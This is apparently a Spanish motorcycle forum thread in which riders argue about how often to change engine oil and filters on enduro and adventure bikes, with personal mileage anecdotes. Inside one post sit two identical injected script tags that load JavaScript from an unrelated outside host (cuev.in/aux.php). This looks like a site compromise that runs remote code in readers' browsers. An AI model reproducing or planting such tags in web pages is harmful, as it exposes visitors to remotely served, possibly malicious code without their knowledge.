Pues una cosa que yo también me pregunto. Alguien que nos ilumine?
Versión para imprimir
:-D pues ya veremos , a ver si me llega el presupuesto para un powercomander que ahora me va muy seca, y ya contare
Yo creo que lo del cambio de aceite es un argumento mas de ventas, igual que los coches, que si el longlife y tal y cual, y luego el mismo mecanico del concesionario oficial te dice de tapadillo que mejor le hagas cambios intermedios cada 10 o 15.000 kms.
Allá cada cual con su dinero, pero ni loco le dejo yo el mismo aceite 10.000 kms en una moto que hace offroad, ciudad etc.
En las enduro es que el el aceite sufre muchisimo mas, el motor coje temperaturas mas altas y el embrague trabaja mas en trialeras y enganchadas. Pero si no haces enduro de verdad, tampoco es problema aguantarlo algo más.<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>
Coincido contigo y añado que depende del uso.
Imaginemos una moto que solo se usa para salidas off-road y complicadas, de esas que en una mañana entera, pongamos 5 horas, apenas haces 50 km, o sea, una media de 10 km/h.
Esa moto, cuando lleve 5.000 km, el aceite habrá pasado 500 horas dentro del motor, lo que es una bestialidad.
Sin embargo imaginemos esa misma DRZ que ya solo se usa para ir a trabajar y cada día hace 100 km en 1 h, entonces cuando lleve 5.000 km, el aceite apenas habrá pasado 50 h. dentro del motor, lo que es una cifra razonable.
Como tampoco es igual un usa tranquilo, que uno rácing.
Y todo esto hay manuales que lo indican, como el de la 690, que dice que hay que cambiarlo cada 10.000 km (6.214 millas), 5.000 horas ( 3.107 millas), después de cada carrera o 1 año, se entiende que lo que ocurra antes.
Aun así, como dice JOE, yo no lo veo bien.
10.000 km me parecen muchos, incluso para un uso exclusivo de carretera a velocidades altas.
5.000 h. también me parecen muchas, no se como sacan la media estos de KTM, por que 3.107 millas son 5.000 km y para hacerlo en 5.000 horas, sale una media de 1 km/h y si la media fuera de 100 km/h, esas 5.000 horas equivaldrían a 500.000 km !!!!!!! sin duda debe ser un error del manual, quizás quisieron decir 50 horas, que ya es mas razonable.
Después de cada carrera, pues si es un Dakar lo veo demasiado y si es un enduro de 1 día, lo veo poco.
Y cada año, con un aceite bueno, también lo veo excesivo, pues aguantan perfectamente 2 y 3 años y esto dicho por un técnico que trabaja en una petrolera y los analizan a menudo, pero claro, ahí los fabricantes de aceites suelen tener acuerdos comerciales con los fabricantes de vehículos y claro, hay que hacer gasto.
Resumiendo, creo que hay que cambiarlo según el uso y tomarse el manual como una referencia, pero no como una verdad absoluta, sobretodo si es muy pobre con la información ofrecida y solo contempla horas de servicio o km recorridos.
Bien por KTM por contemplar diferentes variables: km recorridos, horas de servicio, uso empleado y tiempo transcurrido.
Un saludo a Iggybar https://st.forocoches.com/foro/images/smilies/sisi3.gif
Independientemente de los kilómetros que aconseje el fabricante, que a fin de cuentas es el más sabe y mejor conoce el motor de cada moto, yo lo cambio a la que veo que ya pierde el colorcillo marronete y empieza a volverse oscuro, lleve 5, 7 u 8.000 km.
En la DRZ creo recordar quer era cada 6.000 km y mis cambios jamás se alargaron más allá de los 4, 4.500 km, y soy de los siempre cambio los filtros en todas las motos.
Yo no espero a los 10.000. Como mucho 7.500.
Yo hago lo mismo, suelo guiarme mas por el uso que le he dado, que por los km recorridos.
Excepto en épocas donde el uso era siempre el mismo y mayoritariamente asfáltico.
Ahí cada X km y listo.
Sobre el filtro, leí hace años (no recuerdo el autor), que cambiar un aceite sin cambiar el filtro, es como ducharte sin cambiarte los calzoncillos.
Poder se puede, pero ..............
Mi opinión.
Si te gusta la moto, cómprala
Es una buena moto, yo es la cuarta que tengo y en ninguna de las que he tenido, he tenido la más mínima pega.
La primera me la quite con 72000 kms
La segunda con 25000
La tercera ya fue la 800 Adventure 2 años y 52000 kms
Y la última la 800 normal que tiene 4000 kms
He podido tener otras motos pero lo que te perjudican en algo, te benefician en otra cosa.
He tenido 990 r, super tenere 1200, y GS 1200 Adventure y siempre he vuelto a la 800.
Para lo que yo la empleo, es lo más Polivalente que he encontrado.
Saludos